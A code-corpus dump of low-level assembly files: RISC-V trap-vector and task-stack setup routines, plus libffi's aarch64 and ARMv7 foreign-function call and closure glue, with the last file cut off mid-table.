addi a0, a0, -(22 * portWORD_SIZE) /* Space for registers x11-x31. */
store_x a2, 0(a0) /* Task parameters (pvParameters parameter) goes into register X10/a0 on the stack. */
addi a0, a0, -(6 * portWORD_SIZE) /* Space for registers x5-x9. */
store_x x0, 0(a0) /* Return address onto the stack, could be portTASK_RETURN_ADDRESS */
addi t0, x0, portasmADDITIONAL_CONTEXT_SIZE /* The number of chip specific additional registers. */
chip_specific_stack_frame: /* First add any chip specific registers to the stack frame being created. */
beq t0, x0, 1f /* No more chip specific registers to save. */
addi a0, a0, -portWORD_SIZE /* Make space for chip specific register. */
store_x x0, 0(a0) /* Give the chip specific register an initial value of zero. */
addi t0, t0, -1 /* Decrement the count of chip specific registers remaining. */
j chip_specific_stack_frame /* Until no more chip specific registers. */
1:
addi a0, a0, -portWORD_SIZE
store_x a1, 0(a0) /* mret value (pxCode parameter) onto the stack. */
ret
.endfunc
/*-----------------------------------------------------------*/
|
aignacio/nox
| 3,310
|
sw/soc_hello_world/init/vector.S
|
/**
* RISC-V bootup test
* Author: Daniele Lacamera <root@danielinux.net>
* Modified by: Anderson Ignacio <anderson@aignacio.com>
*
* MIT License
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
.macro trap_entry
# Allocate space on the stack, we need to save the
# context of 16*32-bit registers what's equals to
# 16*(4 bytes) = 64 bytes
addi sp, sp, -64
# Start saving the "Caller" registers in the stack
sw ra, 0(sp)
sw t0, 4(sp)
sw t1, 8(sp)
sw t2, 12(sp)
sw a0, 16(sp)
sw a1, 20(sp)
sw a2, 24(sp)
sw a3, 28(sp)
sw a4, 32(sp)
sw a5, 36(sp)
sw a6, 40(sp)
sw a7, 44(sp)
sw t3, 48(sp)
sw t4, 52(sp)
sw t5, 56(sp)
sw t6, 60(sp)
.endm
.macro trap_exit
# We'll return from the trap entry, so we restore
# the context stored in the stack...
lw ra, 0(sp)
lw t0, 4(sp)
lw t1, 8(sp)
lw t2, 12(sp)
lw a0, 16(sp)
lw a1, 20(sp)
lw a2, 24(sp)
lw a3, 28(sp)
lw a4, 32(sp)
lw a5, 36(sp)
lw a6, 40(sp)
lw a7, 44(sp)
lw t3, 48(sp)
lw t4, 52(sp)
lw t5, 56(sp)
lw t6, 60(sp)
# ...and we deallocate space on the stack return
addi sp, sp, 64
# ing from the trap with mret
mret
.endm
.option norvc
.section .isr_vector
# In this section we're going to list all PC addresses that the hardware
# will go to jump on trap execution, in the code below we consider that
# vectored interrupt are actived (i.e MTVEC[1:0] = 1)
# synchronous trap = exceptions
# asynchronous trap = interrupts
.align 8 # Align to the next 2^8=256 bytes, or 0x100 offset address
trap_vectors:
j _synctrap # Base trap address (also sync trap address)
nop
nop
j trap_machine_software_int # MTVEC = [Trap base] + 0x4*3 = 0x0C
nop
nop
nop
j trap_machine_timer_int # MTVEC = [Trap base] + 0x4*7 = 0x1C
nop
nop
nop
j trap_machine_external_int # MTVEC = [Trap base] + 0x4*11 = 0x2C
.align 2
_synctrap:
trap_entry
jal isr_synctrap
trap_exit
trap_machine_software_int:
trap_entry
jal isr_m_software
trap_exit
trap_machine_timer_int:
trap_entry
jal isr_m_timer
trap_exit
trap_machine_external_int:
trap_entry
jal isr_m_external
trap_exit
|
aignacio/nox
| 3,310
|
sw/bootloader/init/vector.S
|
/**
* RISC-V bootup test
* Author: Daniele Lacamera <root@danielinux.net>
* Modified by: Anderson Ignacio <anderson@aignacio.com>
*
* MIT License
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
.macro trap_entry
# Allocate space on the stack, we need to save the
# context of 16*32-bit registers what's equals to
# 16*(4 bytes) = 64 bytes
addi sp, sp, -64
# Start saving the "Caller" registers in the stack
sw ra, 0(sp)
sw t0, 4(sp)
sw t1, 8(sp)
sw t2, 12(sp)
sw a0, 16(sp)
sw a1, 20(sp)
sw a2, 24(sp)
sw a3, 28(sp)
sw a4, 32(sp)
sw a5, 36(sp)
sw a6, 40(sp)
sw a7, 44(sp)
sw t3, 48(sp)
sw t4, 52(sp)
sw t5, 56(sp)
sw t6, 60(sp)
.endm
.macro trap_exit
# We'll return from the trap entry, so we restore
# the context stored in the stack...
lw ra, 0(sp)
lw t0, 4(sp)
lw t1, 8(sp)
lw t2, 12(sp)
lw a0, 16(sp)
lw a1, 20(sp)
lw a2, 24(sp)
lw a3, 28(sp)
lw a4, 32(sp)
lw a5, 36(sp)
lw a6, 40(sp)
lw a7, 44(sp)
lw t3, 48(sp)
lw t4, 52(sp)
lw t5, 56(sp)
lw t6, 60(sp)
# ...and we deallocate space on the stack return
addi sp, sp, 64
# ing from the trap with mret
mret
.endm
.option norvc
.section .isr_vector
# In this section we're going to list all PC addresses that the hardware
# will go to jump on trap execution, in the code below we consider that
# vectored interrupt are actived (i.e MTVEC[1:0] = 1)
# synchronous trap = exceptions
# asynchronous trap = interrupts
.align 8 # Align to the next 2^8=256 bytes, or 0x100 offset address
trap_vectors:
j _synctrap # Base trap address (also sync trap address)
nop
nop
j trap_machine_software_int # MTVEC = [Trap base] + 0x4*3 = 0x0C
nop
nop
nop
j trap_machine_timer_int # MTVEC = [Trap base] + 0x4*7 = 0x1C
nop
nop
nop
j trap_machine_external_int # MTVEC = [Trap base] + 0x4*11 = 0x2C
.align 2
_synctrap:
trap_entry
jal isr_synctrap
trap_exit
trap_machine_software_int:
trap_entry
jal isr_m_software
trap_exit
trap_machine_timer_int:
trap_entry
jal isr_m_timer
trap_exit
trap_machine_external_int:
trap_entry
jal isr_m_external
trap_exit
|
aimardcr/APKKiller
| 11,155
|
app/src/main/cpp/whale/src/libffi/aarch64/sysv_arm64.S
|
#if defined(__aarch64__)
/* Copyright (c) 2009, 2010, 2011, 2012 ARM Ltd.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
``Software''), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */
#define LIBFFI_ASM
#include <fficonfig.h>
#include <ffi.h>
#include <ffi_cfi.h>
#include "internal.h"
#ifdef HAVE_MACHINE_ASM_H
#include <machine/asm.h>
#else
#ifdef __USER_LABEL_PREFIX__
#define CONCAT1(a, b) CONCAT2(a, b)
#define CONCAT2(a, b) a ## b
/* Use the right prefix for global labels. */
#define CNAME(x) CONCAT1 (__USER_LABEL_PREFIX__, x)
#else
#define CNAME(x) x
#endif
#endif
#ifdef __AARCH64EB__
# define BE(X) X
#else
# define BE(X) 0
#endif
#ifdef __ILP32__
#define PTR_REG(n) w##n
#else
#define PTR_REG(n) x##n
#endif
#ifdef __ILP32__
#define PTR_SIZE 4
#else
#define PTR_SIZE 8
#endif
.text
.align 4
/* ffi_call_SYSV
extern void ffi_call_SYSV (void *stack, void *frame,
void (*fn)(void), void *rvalue,
int flags, void *closure);
Therefore on entry we have:
x0 stack
x1 frame
x2 fn
x3 rvalue
x4 flags
x5 closure
*/
cfi_startproc
CNAME(ffi_call_SYSV):
/* Use a stack frame allocated by our caller. */
cfi_def_cfa(x1, 32);
stp x29, x30, [x1]
mov x29, x1
mov sp, x0
cfi_def_cfa_register(x29)
cfi_rel_offset (x29, 0)
cfi_rel_offset (x30, 8)
mov x9, x2 /* save fn */
mov x8, x3 /* install structure return */
#ifdef FFI_GO_CLOSURES
mov x18, x5 /* install static chain */
#endif
stp x3, x4, [x29, #16] /* save rvalue and flags */
/* Load the vector argument passing registers, if necessary. */
tbz w4, #AARCH64_FLAG_ARG_V_BIT, 1f
ldp q0, q1, [sp, #0]
ldp q2, q3, [sp, #32]
ldp q4, q5, [sp, #64]
ldp q6, q7, [sp, #96]
1:
/* Load the core argument passing registers, including
the structure return pointer. */
ldp x0, x1, [sp, #16*N_V_ARG_REG + 0]
ldp x2, x3, [sp, #16*N_V_ARG_REG + 16]
ldp x4, x5, [sp, #16*N_V_ARG_REG + 32]
ldp x6, x7, [sp, #16*N_V_ARG_REG + 48]
/* Deallocate the context, leaving the stacked arguments. */
add sp, sp, #CALL_CONTEXT_SIZE
blr x9 /* call fn */
ldp x3, x4, [x29, #16] /* reload rvalue and flags */
/* Partially deconstruct the stack frame. */
mov sp, x29
cfi_def_cfa_register (sp)
ldp x29, x30, [x29]
/* Save the return value as directed. */
adr x5, 0f
and w4, w4, #AARCH64_RET_MASK
add x5, x5, x4, lsl #3
br x5
/* Note that each table entry is 2 insns, and thus 8 bytes.
For integer data, note that we're storing into ffi_arg
and therefore we want to extend to 64 bits; these types
have two consecutive entries allocated for them. */
.align 4
0: ret /* VOID */
nop
1: str x0, [x3] /* INT64 */
ret
2: stp x0, x1, [x3] /* INT128 */
ret
3: brk #1000 /* UNUSED */
ret
4: brk #1000 /* UNUSED */
ret
5: brk #1000 /* UNUSED */
ret
6: brk #1000 /* UNUSED */
ret
7: brk #1000 /* UNUSED */
ret
8: st4 { v0.s, v1.s, v2.s, v3.s }[0], [x3] /* S4 */
ret
9: st3 { v0.s, v1.s, v2.s }[0], [x3] /* S3 */
ret
10: stp s0, s1, [x3] /* S2 */
ret
11: str s0, [x3] /* S1 */
ret
12: st4 { v0.d, v1.d, v2.d, v3.d }[0], [x3] /* D4 */
ret
13: st3 { v0.d, v1.d, v2.d }[0], [x3] /* D3 */
ret
14: stp d0, d1, [x3] /* D2 */
ret
15: str d0, [x3] /* D1 */
ret
16: str q3, [x3, #48] /* Q4 */
nop
17: str q2, [x3, #32] /* Q3 */
nop
18: stp q0, q1, [x3] /* Q2 */
ret
19: str q0, [x3] /* Q1 */
ret
20: uxtb w0, w0 /* UINT8 */
str x0, [x3]
21: ret /* reserved */
nop
22: uxth w0, w0 /* UINT16 */
str x0, [x3]
23: ret /* reserved */
nop
24: mov w0, w0 /* UINT32 */
str x0, [x3]
25: ret /* reserved */
nop
26: sxtb x0, w0 /* SINT8 */
str x0, [x3]
27: ret /* reserved */
nop
28: sxth x0, w0 /* SINT16 */
str x0, [x3]
29: ret /* reserved */
nop
30: sxtw x0, w0 /* SINT32 */
str x0, [x3]
31: ret /* reserved */
nop
cfi_endproc
.globl CNAME(ffi_call_SYSV)
#ifdef __ELF__
.type CNAME(ffi_call_SYSV), #function
.hidden CNAME(ffi_call_SYSV)
.size CNAME(ffi_call_SYSV), .-CNAME(ffi_call_SYSV)
#endif
/* ffi_closure_SYSV
Closure invocation glue. This is the low level code invoked directly by
the closure trampoline to setup and call a closure.
On entry x17 points to a struct ffi_closure, x16 has been clobbered
all other registers are preserved.
We allocate a call context and save the argument passing registers,
then invoked the generic C ffi_closure_SYSV_inner() function to do all
the real work, on return we load the result passing registers back from
the call context.
*/
#define ffi_closure_SYSV_FS (8*2 + CALL_CONTEXT_SIZE + 64)
.align 4
CNAME(ffi_closure_SYSV_V):
cfi_startproc
stp x29, x30, [sp, #-ffi_closure_SYSV_FS]!
cfi_adjust_cfa_offset (ffi_closure_SYSV_FS)
cfi_rel_offset (x29, 0)
cfi_rel_offset (x30, 8)
/* Save the argument passing vector registers. */
stp q0, q1, [sp, #16 + 0]
stp q2, q3, [sp, #16 + 32]
stp q4, q5, [sp, #16 + 64]
stp q6, q7, [sp, #16 + 96]
b 0f
cfi_endproc
.globl CNAME(ffi_closure_SYSV_V)
#ifdef __ELF__
.type CNAME(ffi_closure_SYSV_V), #function
.hidden CNAME(ffi_closure_SYSV_V)
.size CNAME(ffi_closure_SYSV_V), . - CNAME(ffi_closure_SYSV_V)
#endif
.align 4
cfi_startproc
CNAME(ffi_closure_SYSV):
stp x29, x30, [sp, #-ffi_closure_SYSV_FS]!
cfi_adjust_cfa_offset (ffi_closure_SYSV_FS)
cfi_rel_offset (x29, 0)
cfi_rel_offset (x30, 8)
0:
mov x29, sp
/* Save the argument passing core registers. */
stp x0, x1, [sp, #16 + 16*N_V_ARG_REG + 0]
stp x2, x3, [sp, #16 + 16*N_V_ARG_REG + 16]
stp x4, x5, [sp, #16 + 16*N_V_ARG_REG + 32]
stp x6, x7, [sp, #16 + 16*N_V_ARG_REG + 48]
/* Load ffi_closure_inner arguments. */
ldp PTR_REG(0), PTR_REG(1), [x17, #FFI_TRAMPOLINE_CLOSURE_OFFSET] /* load cif, fn */
ldr PTR_REG(2), [x17, #FFI_TRAMPOLINE_CLOSURE_OFFSET+PTR_SIZE*2] /* load user_data */
.Ldo_closure:
add x3, sp, #16 /* load context */
add x4, sp, #ffi_closure_SYSV_FS /* load stack */
add x5, sp, #16+CALL_CONTEXT_SIZE /* load rvalue */
mov x6, x8 /* load struct_rval */
bl CNAME(ffi_closure_SYSV_inner)
/* Load the return value as directed. */
adr x1, 0f
and w0, w0, #AARCH64_RET_MASK
add x1, x1, x0, lsl #3
add x3, sp, #16+CALL_CONTEXT_SIZE
br x1
/* Note that each table entry is 2 insns, and thus 8 bytes. */
.align 4
0: b 99f /* VOID */
nop
1: ldr x0, [x3] /* INT64 */
b 99f
2: ldp x0, x1, [x3] /* INT128 */
b 99f
3: brk #1000 /* UNUSED */
nop
4: brk #1000 /* UNUSED */
nop
5: brk #1000 /* UNUSED */
nop
6: brk #1000 /* UNUSED */
nop
7: brk #1000 /* UNUSED */
nop
8: ldr s3, [x3, #12] /* S4 */
nop
9: ldr s2, [x3, #8] /* S3 */
nop
10: ldp s0, s1, [x3] /* S2 */
b 99f
11: ldr s0, [x3] /* S1 */
b 99f
12: ldr d3, [x3, #24] /* D4 */
nop
13: ldr d2, [x3, #16] /* D3 */
nop
14: ldp d0, d1, [x3] /* D2 */
b 99f
15: ldr d0, [x3] /* D1 */
b 99f
16: ldr q3, [x3, #48] /* Q4 */
nop
17: ldr q2, [x3, #32] /* Q3 */
nop
18: ldp q0, q1, [x3] /* Q2 */
b 99f
19: ldr q0, [x3] /* Q1 */
b 99f
20: ldrb w0, [x3, #BE(7)] /* UINT8 */
b 99f
21: brk #1000 /* reserved */
nop
22: ldrh w0, [x3, #BE(6)] /* UINT16 */
b 99f
23: brk #1000 /* reserved */
nop
24: ldr w0, [x3, #BE(4)] /* UINT32 */
b 99f
25: brk #1000 /* reserved */
nop
26: ldrsb x0, [x3, #BE(7)] /* SINT8 */
b 99f
27: brk #1000 /* reserved */
nop
28: ldrsh x0, [x3, #BE(6)] /* SINT16 */
b 99f
29: brk #1000 /* reserved */
nop
30: ldrsw x0, [x3, #BE(4)] /* SINT32 */
nop
31: /* reserved */
99: ldp x29, x30, [sp], #ffi_closure_SYSV_FS
cfi_adjust_cfa_offset (-ffi_closure_SYSV_FS)
cfi_restore (x29)
cfi_restore (x30)
ret
cfi_endproc
.globl CNAME(ffi_closure_SYSV)
#ifdef __ELF__
.type CNAME(ffi_closure_SYSV), #function
.hidden CNAME(ffi_closure_SYSV)
.size CNAME(ffi_closure_SYSV), . - CNAME(ffi_closure_SYSV)
#endif
#if FFI_EXEC_TRAMPOLINE_TABLE
#ifdef __MACH__
#include <mach/machine/vm_param.h>
.align PAGE_MAX_SHIFT
CNAME(ffi_closure_trampoline_table_page):
.rept PAGE_MAX_SIZE / FFI_TRAMPOLINE_SIZE
adr x16, -PAGE_MAX_SIZE
ldp x17, x16, [x16]
br x16
nop /* each entry in the trampoline config page is 2*sizeof(void*) so the trampoline itself cannot be smaller that 16 bytes */
.endr
.globl CNAME(ffi_closure_trampoline_table_page)
#ifdef __ELF__
.type CNAME(ffi_closure_trampoline_table_page), #function
.hidden CNAME(ffi_closure_trampoline_table_page)
.size CNAME(ffi_closure_trampoline_table_page), . - CNAME(ffi_closure_trampoline_table_page)
#endif
#endif
#endif /* FFI_EXEC_TRAMPOLINE_TABLE */
#ifdef FFI_GO_CLOSURES
.align 4
CNAME(ffi_go_closure_SYSV_V):
cfi_startproc
stp x29, x30, [sp, #-ffi_closure_SYSV_FS]!
cfi_adjust_cfa_offset (ffi_closure_SYSV_FS)
cfi_rel_offset (x29, 0)
cfi_rel_offset (x30, 8)
/* Save the argument passing vector registers. */
stp q0, q1, [sp, #16 + 0]
stp q2, q3, [sp, #16 + 32]
stp q4, q5, [sp, #16 + 64]
stp q6, q7, [sp, #16 + 96]
b 0f
cfi_endproc
.globl CNAME(ffi_go_closure_SYSV_V)
#ifdef __ELF__
.type CNAME(ffi_go_closure_SYSV_V), #function
.hidden CNAME(ffi_go_closure_SYSV_V)
.size CNAME(ffi_go_closure_SYSV_V), . - CNAME(ffi_go_closure_SYSV_V)
#endif
.align 4
cfi_startproc
CNAME(ffi_go_closure_SYSV):
stp x29, x30, [sp, #-ffi_closure_SYSV_FS]!
cfi_adjust_cfa_offset (ffi_closure_SYSV_FS)
cfi_rel_offset (x29, 0)
cfi_rel_offset (x30, 8)
0:
mov x29, sp
/* Save the argument passing core registers. */
stp x0, x1, [sp, #16 + 16*N_V_ARG_REG + 0]
stp x2, x3, [sp, #16 + 16*N_V_ARG_REG + 16]
stp x4, x5, [sp, #16 + 16*N_V_ARG_REG + 32]
stp x6, x7, [sp, #16 + 16*N_V_ARG_REG + 48]
/* Load ffi_closure_inner arguments. */
ldp PTR_REG(0), PTR_REG(1), [x18, #PTR_SIZE]/* load cif, fn */
mov x2, x18 /* load user_data */
b .Ldo_closure
cfi_endproc
.globl CNAME(ffi_go_closure_SYSV)
#ifdef __ELF__
.type CNAME(ffi_go_closure_SYSV), #function
.hidden CNAME(ffi_go_closure_SYSV)
.size CNAME(ffi_go_closure_SYSV), . - CNAME(ffi_go_closure_SYSV)
#endif
#endif /* FFI_GO_CLOSURES */
#if defined __ELF__ && defined __linux__
.section .note.GNU-stack,"",%progbits
#endif
#endif
|
aimardcr/APKKiller
| 9,731
|
app/src/main/cpp/whale/src/libffi/arm/sysv_armv7.S
|
#ifdef __arm__
/* -----------------------------------------------------------------------
sysv.S - Copyright (c) 1998, 2008, 2011 Red Hat, Inc.
Copyright (c) 2011 Plausible Labs Cooperative, Inc.
ARM Foreign Function Interface
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
``Software''), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------- */
#define LIBFFI_ASM
#include <fficonfig.h>
#include <ffi.h>
#include <ffi_cfi.h>
#include "internal.h"
/* GCC 4.8 provides __ARM_ARCH; construct it otherwise. */
#ifndef __ARM_ARCH
# if defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) \
|| defined(__ARM_ARCH_7R__) || defined(__ARM_ARCH_7M__) \
|| defined(__ARM_ARCH_7EM__)
# define __ARM_ARCH 7
# elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6J__) \
|| defined(__ARM_ARCH_6K__) || defined(__ARM_ARCH_6Z__) \
|| defined(__ARM_ARCH_6ZK__) || defined(__ARM_ARCH_6T2__) \
|| defined(__ARM_ARCH_6M__)
# define __ARM_ARCH 6
# elif defined(__ARM_ARCH_5__) || defined(__ARM_ARCH_5T__) \
|| defined(__ARM_ARCH_5E__) || defined(__ARM_ARCH_5TE__) \
|| defined(__ARM_ARCH_5TEJ__)
# define __ARM_ARCH 5
# else
# define __ARM_ARCH 4
# endif
#endif
/* Conditionally compile unwinder directives. */
#ifdef __ARM_EABI__
# define UNWIND(...) __VA_ARGS__
#else
# define UNWIND(...)
#endif
#if defined(HAVE_AS_CFI_PSEUDO_OP) && defined(__ARM_EABI__)
.cfi_sections .debug_frame
#endif
#define CONCAT(a, b) CONCAT2(a, b)
#define CONCAT2(a, b) a ## b
#ifdef __USER_LABEL_PREFIX__
# define CNAME(X) CONCAT (__USER_LABEL_PREFIX__, X)
#else
# define CNAME(X) X
#endif
#ifdef __ELF__
# define SIZE(X) .size CNAME(X), . - CNAME(X)
# define TYPE(X, Y) .type CNAME(X), Y
#else
# define SIZE(X)
# define TYPE(X, Y)
#endif
#define ARM_FUNC_START_LOCAL(name) \
.align 3; \
TYPE(CNAME(name), %function); \
CNAME(name):
#define ARM_FUNC_START(name) \
.globl CNAME(name); \
FFI_HIDDEN(CNAME(name)); \
ARM_FUNC_START_LOCAL(name)
#define ARM_FUNC_END(name) \
SIZE(name)
/* Aid in defining a jump table with 8 bytes between entries. */
/* ??? The clang assembler doesn't handle .if with symbolic expressions. */
#ifdef __clang__
# define E(index)
#else
# define E(index) \
.if . - 0b - 8*index; \
.error "type table out of sync"; \
.endif
#endif
.text
.syntax unified
.arm
#ifndef __clang__
/* We require interworking on LDM, which implies ARMv5T,
which implies the existance of BLX. */
.arch armv5t
#endif
/* Note that we use STC and LDC to encode VFP instructions,
so that we do not need ".fpu vfp", nor get that added to
the object file attributes. These will not be executed
unless the FFI_VFP abi is used. */
@ r0: stack
@ r1: frame
@ r2: fn
@ r3: vfp_used
ARM_FUNC_START(ffi_call_VFP)
UNWIND(.fnstart)
cfi_startproc
cmp r3, #3 @ load only d0 if possible
#ifdef __clang__
vldrle d0, [sp]
vldmgt sp, {d0-d7}
#else
ldcle p11, cr0, [r0] @ vldrle d0, [sp]
ldcgt p11, cr0, [r0], {16} @ vldmgt sp, {d0-d7}
#endif
add r0, r0, #64 @ discard the vfp register args
/* FALLTHRU */
ARM_FUNC_END(ffi_call_VFP)
ARM_FUNC_START(ffi_call_SYSV)
stm r1, {fp, lr}
mov fp, r1
@ This is a bit of a lie wrt the origin of the unwind info, but
@ now we've got the usual frame pointer and two saved registers.
UNWIND(.save {fp,lr})
UNWIND(.setfp fp, sp)
cfi_def_cfa(fp, 8)
cfi_rel_offset(fp, 0)
cfi_rel_offset(lr, 4)
mov sp, r0 @ install the stack pointer
mov lr, r2 @ move the fn pointer out of the way
ldr ip, [fp, #16] @ install the static chain
ldmia sp!, {r0-r3} @ move first 4 parameters in registers.
blx lr @ call fn
@ Load r2 with the pointer to storage for the return value
@ Load r3 with the return type code
ldr r2, [fp, #8]
ldr r3, [fp, #12]
@ Deallocate the stack with the arguments.
mov sp, fp
cfi_def_cfa_register(sp)
@ Store values stored in registers.
.align 3
add pc, pc, r3, lsl #3
nop
0:
E(ARM_TYPE_VFP_S)
#ifdef __clang__
vstr s0, [r2]
#else
stc p10, cr0, [r2] @ vstr s0, [r2]
#endif
pop {fp,pc}
E(ARM_TYPE_VFP_D)
#ifdef __clang__
vstr d0, [r2]
#else
stc p11, cr0, [r2] @ vstr d0, [r2]
#endif
pop {fp,pc}
E(ARM_TYPE_VFP_N)
#ifdef __clang__
vstm r2, {d0-d3}
#else
stc p11, cr0, [r2], {8} @ vstm r2, {d0-d3}
#endif
pop {fp,pc}
E(ARM_TYPE_INT64)
str r1, [r2, #4]
nop
E(ARM_TYPE_INT)
str r0, [r2]
pop {fp,pc}
E(ARM_TYPE_VOID)
pop {fp,pc}
nop
E(ARM_TYPE_STRUCT)
pop {fp,pc}
cfi_endproc
UNWIND(.fnend)
ARM_FUNC_END(ffi_call_SYSV)
/*
int ffi_closure_inner_* (cif, fun, user_data, frame)
*/
ARM_FUNC_START(ffi_go_closure_SYSV)
cfi_startproc
stmdb sp!, {r0-r3} @ save argument regs
cfi_adjust_cfa_offset(16)
ldr r0, [ip, #4] @ load cif
ldr r1, [ip, #8] @ load fun
mov r2, ip @ load user_data
b 0f
cfi_endproc
ARM_FUNC_END(ffi_go_closure_SYSV)
ARM_FUNC_START(ffi_closure_SYSV)
UNWIND(.fnstart)
cfi_startproc
stmdb sp!, {r0-r3} @ save argument regs
cfi_adjust_cfa_offset(16)
#if FFI_EXEC_TRAMPOLINE_TABLE
ldr ip, [ip] @ ip points to the config page, dereference to get the ffi_closure*
#endif
ldr r0, [ip, #FFI_TRAMPOLINE_CLOSURE_OFFSET] @ load cif
ldr r1, [ip, #FFI_TRAMPOLINE_CLOSURE_OFFSET+4] @ load fun
ldr r2, [ip, #FFI_TRAMPOLINE_CLOSURE_OFFSET+8] @ load user_data
0:
add ip, sp, #16 @ compute entry sp
sub sp, sp, #64+32 @ allocate frame
cfi_adjust_cfa_offset(64+32)
stmdb sp!, {ip,lr}
/* Remember that EABI unwind info only applies at call sites.
We need do nothing except note the save of the stack pointer
and the link registers. */
UNWIND(.save {sp,lr})
cfi_adjust_cfa_offset(8)
cfi_rel_offset(lr, 4)
add r3, sp, #8 @ load frame
bl CNAME(ffi_closure_inner_SYSV)
@ Load values returned in registers.
add r2, sp, #8+64 @ load result
adr r3, CNAME(ffi_closure_ret)
add pc, r3, r0, lsl #3
cfi_endproc
UNWIND(.fnend)
ARM_FUNC_END(ffi_closure_SYSV)
ARM_FUNC_START(ffi_go_closure_VFP)
cfi_startproc
stmdb sp!, {r0-r3} @ save argument regs
cfi_adjust_cfa_offset(16)
ldr r0, [ip, #4] @ load cif
ldr r1, [ip, #8] @ load fun
mov r2, ip @ load user_data
b 0f
cfi_endproc
ARM_FUNC_END(ffi_go_closure_VFP)
ARM_FUNC_START(ffi_closure_VFP)
UNWIND(.fnstart)
cfi_startproc
stmdb sp!, {r0-r3} @ save argument regs
cfi_adjust_cfa_offset(16)
#if FFI_EXEC_TRAMPOLINE_TABLE
ldr ip, [ip] @ ip points to the config page, dereference to get the ffi_closure*
#endif
ldr r0, [ip, #FFI_TRAMPOLINE_CLOSURE_OFFSET] @ load cif
ldr r1, [ip, #FFI_TRAMPOLINE_CLOSURE_OFFSET+4] @ load fun
ldr r2, [ip, #FFI_TRAMPOLINE_CLOSURE_OFFSET+8] @ load user_data
0:
add ip, sp, #16
sub sp, sp, #64+32 @ allocate frame
cfi_adjust_cfa_offset(64+32)
#ifdef __clang__
vstm sp, {d0-d7}
#else
stc p11, cr0, [sp], {16} @ vstm sp, {d0-d7}
#endif
stmdb sp!, {ip,lr}
/* See above. */
UNWIND(.save {sp,lr})
cfi_adjust_cfa_offset(8)
cfi_rel_offset(lr, 4)
add r3, sp, #8 @ load frame
bl CNAME(ffi_closure_inner_VFP)
@ Load values returned in registers.
add r2, sp, #8+64 @ load result
adr r3, CNAME(ffi_closure_ret)
add pc, r3, r0, lsl #3
cfi_endproc
UNWIND(.fnend)
ARM_FUNC_END(ffi_closure_VFP)
/* Load values returned in registers for both closure entry points.
Note that we use LDM with SP in the register set. This is deprecated
by ARM, but not yet unpredictable. */
ARM_FUNC_START_LOCAL(ffi_closure_ret)
cfi_startproc
cfi_rel_offset(sp, 0)
cfi_rel_offset(lr, 4)
0:
E(ARM_TYPE_VFP_S)
#ifdef __clang__
vldr s0, [r2]
#else
ldc p10, cr0, [r2] @ vldr s0, [r2]
#endif
ldm sp, {sp,pc}
E(ARM_TYPE_VFP_D)
